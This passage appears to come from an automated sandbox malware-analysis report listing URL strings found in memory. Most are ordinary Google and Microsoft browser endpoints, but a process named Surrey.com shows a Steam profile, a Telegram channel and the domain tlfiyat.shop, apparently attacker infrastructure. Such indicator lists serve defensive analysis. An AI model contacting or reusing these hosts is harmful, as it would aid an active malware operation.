Source: chrome.exe, 00000013.00000002.2833227265.00004898008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000013.00000002.2813579578.00002034001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 00000013.00000002.2812912427.00002034000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2826363872.0000203401489000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000013.00000002.2814805075.000020340040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2750403309.000020340141C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2752834457.0000203401364000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
Source: chrome.exe, 00000013.00000002.2815827330.00002034006A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2826363872.0000203401489000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819115981.0000203400BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000013.00000002.2819115981.0000203400BB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp4
Source: chrome.exe, 00000013.00000002.2812912427.00002034000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2826363872.0000203401489000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000013.00000002.2823694505.0000203400F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2812912427.00002034000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2826363872.0000203401489000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2827475731.0000203401DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: msedge.exe, 00000018.00000002.2904824074.00004D94025B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://msn.cn/
Source: msedge.exe, 00000018.00000002.2904824074.00004D94025B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://msn.com/
Source: Cookies.27.dr String found in binary or memory: https://msn.comXID/
Source: Cookies.27.dr String found in binary or memory: https://msn.comXIDv10?
Source: chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815164149.0000203400504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816890818.0000203400780000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815854722.00002034006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000013.00000002.2815854722.00002034006B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyf
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822847002.0000203400E8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000013.00000002.2822847002.0000203400E8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonece
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
Source: chrome.exe, 00000013.00000002.2823920418.0000203401020000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000013.00000003.2736084867.0000203400FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2817962065.0000203400960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2818005553.000020340098F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: 000003.log4.26.dr String found in binary or memory: https://ntp.msn.com
Source: QuotaManager.26.dr String found in binary or memory: https://ntp.msn.com/_default
Source: QuotaManager.26.dr String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default)
Source: QuotaManager.26.dr String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default)/
Source: 2cc80dabc69f58b6_0.26.dr String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: chrome.exe, 00000013.00000002.2813579578.00002034001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000013.00000002.2813665337.000020340020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: msedge.exe, 00000018.00000002.2904824074.00004D94025B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://office.net/
Source: chrome.exe, 00000013.00000003.2752212784.000020340139C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000013.00000003.2785805100.00002034017EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyn
Source: chrome.exe, 00000013.00000003.2755360525.00002034002A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000013.00000003.2752212784.000020340139C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000013.00000003.2752212784.000020340139C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000013.00000002.2818190866.00002034009A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2813825782.000020340027C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2820952797.0000203400D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000013.00000002.2822847002.0000203400E8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2820952797.0000203400D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000013.00000002.2812849232.00002034000B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2820952797.0000203400D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000013.00000002.2812912427.00002034000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2820952797.0000203400D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000013.00000002.2829434480.0000203401E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2820952797.0000203400D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000013.00000002.2812632110.0000203400044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2824592418.0000203401124000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000013.00000002.2812912427.00002034000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2820952797.0000203400D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000013.00000002.2812849232.00002034000B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000013.00000002.2815061486.00002034004C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/AddSession
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/OAuthLogin
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
Source: chrome.exe, 00000013.00000003.2736084867.0000203400FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2817962065.0000203400960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2818005553.000020340098F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000013.00000003.2739414948.0000203400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2739566795.000020340113C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2739699547.000020340120C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chromecache_377.21.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 00000013.00000002.2817962065.0000203400960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2818005553.000020340098F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000013.00000002.2812753636.000020340008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000013.00000002.2812849232.00002034000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000013.00000002.2813579578.00002034001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 00000013.00000002.2822040171.0000203400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815061486.00002034004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816936463.000020340079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816977617.00002034007B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000013.00000002.2822040171.0000203400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815061486.00002034004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816936463.000020340079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816977617.00002034007B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000013.00000003.2748297187.00002034002A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000013.00000002.2814805075.000020340040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2750403309.000020340141C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2752834457.0000203401364000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019B6000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603391503.00000000043EC000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3585659448.00000000043E1000.00000040.00001000.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603286860.0000000001921000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603167258.000000000436E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662
Source: Surrey.com, 0000000D.00000003.2603167258.000000000436E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662go2dnizMozilla/5.0
Source: Surrey.com, 0000000D.00000002.3594564463.0000000007122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Surrey.com, 0000000D.00000002.3594564463.0000000007122000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Surrey.com, 0000000D.00000002.3581492503.00000000018B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: Surrey.com, 0000000D.00000002.3581492503.00000000018B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/7
Source: Surrey.com, 0000000D.00000003.2603234509.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603053985.0000000001935000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603019804.00000000019CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3585659448.00000000043E1000.00000040.00001000.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3582252732.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603286860.0000000001921000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603167258.000000000436E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phell
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phell)
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phell2
Source: Surrey.com, 0000000D.00000003.2603167258.000000000436E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phellgo2dnizMozilla/5.0
Source: chrome.exe, 00000013.00000002.2818277772.00002034009E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000013.00000002.2813579578.00002034001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop#
Source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/
Source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/45V.
Source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/;8
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/O
Source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/P;
Source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/W;
Source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/X5
Source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/_5
Source: Surrey.com, 0000000D.00000002.3581594678.00000000018E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/eplacementmanife
Source: Surrey.com, 0000000D.00000002.3592597038.0000000006E8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/k
Source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/o8
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/s
Source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/s5i.
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shopW
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.26.dr String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.26.dr String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.26.dr String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: Surrey.com, 0000000D.00000002.3584705678.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3592597038.0000000006E8A000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3588082989.0000000006074000.00000004.00000800.00020000.00000000.sdmp, ny5pzu.13.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_cd61a4703a8613be887576f2bd084bcc6f4756dccdbe5062
Source: Surrey.com, 0000000D.00000002.3587128325.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2818984050.0000203400B4C000.00000004.00000800.00020000.00000000.sdmp, v37ycb.13.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000013.00000003.2748297187.00002034002A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000013.00000003.2755360525.00002034002A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2748297187.00002034002A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000013.00000003.2748297187.00002034002A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000013.00000002.2815734698.0000203400654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000013.00000002.2818984050.0000203400B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Chartk3
Source: chrome.exe, 00000013.00000002.2818424523.0000203400A24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000013.00000002.2818424523.0000203400A24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2me/
Source: chrome.exe, 00000013.00000002.2824592418.0000203401124000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_promos
